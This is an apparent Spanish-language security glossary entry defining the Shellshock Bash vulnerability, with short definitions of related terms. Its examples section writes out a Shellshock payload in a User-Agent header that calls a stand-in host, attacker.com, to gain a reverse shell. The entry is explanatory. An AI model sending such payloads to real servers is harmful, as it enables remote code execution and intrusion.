Vulnerabilidades
Shellshock (CVE-2014-6271)
También conocido como: Bashdoor, CVE-2014-6271
Definición
Vulnerabilidad de 2014 en GNU Bash que permitía ejecutar comandos arbitrarios al fijar variables de entorno especialmente diseñadas y pasarlas a Bash a través de otros programas.
Ejemplos
- Enviar un User-Agent como () { :; }; /bin/curl attacker.com a un endpoint Bash-CGI para obtener shell inversa.
- Explotar un cliente DHCP que exporta cadenas de opción al entorno de un hook Bash.
Términos relacionados
Command Injection
Command Injection — definition coming soon.
CVE (Common Vulnerabilities and Exposures)
Catálogo público que asigna un identificador único a cada vulnerabilidad divulgada para referenciarla de forma inequívoca en todo el sector.
Vulnerabilidad explotada conocida (KEV)
CVE que CISA (EE. UU.) confirma como activamente explotada y añade a su catálogo público KEV, imponiendo plazos de remediación a las agencias federales.
Troyano de acceso remoto (RAT)
Malware que da al atacante control encubierto e interactivo de un dispositivo infectado, similar a una herramienta oculta de administración remota.
Exploit
Código, datos o técnica que aprovecha una vulnerabilidad para provocar un comportamiento no previsto, como ejecución de código, escalada de privilegios o fuga de información.
Escalada de privilegios
Clase de vulnerabilidades que permite al atacante obtener permisos superiores a los concedidos inicialmente, por ejemplo pasar de usuario normal a administrador.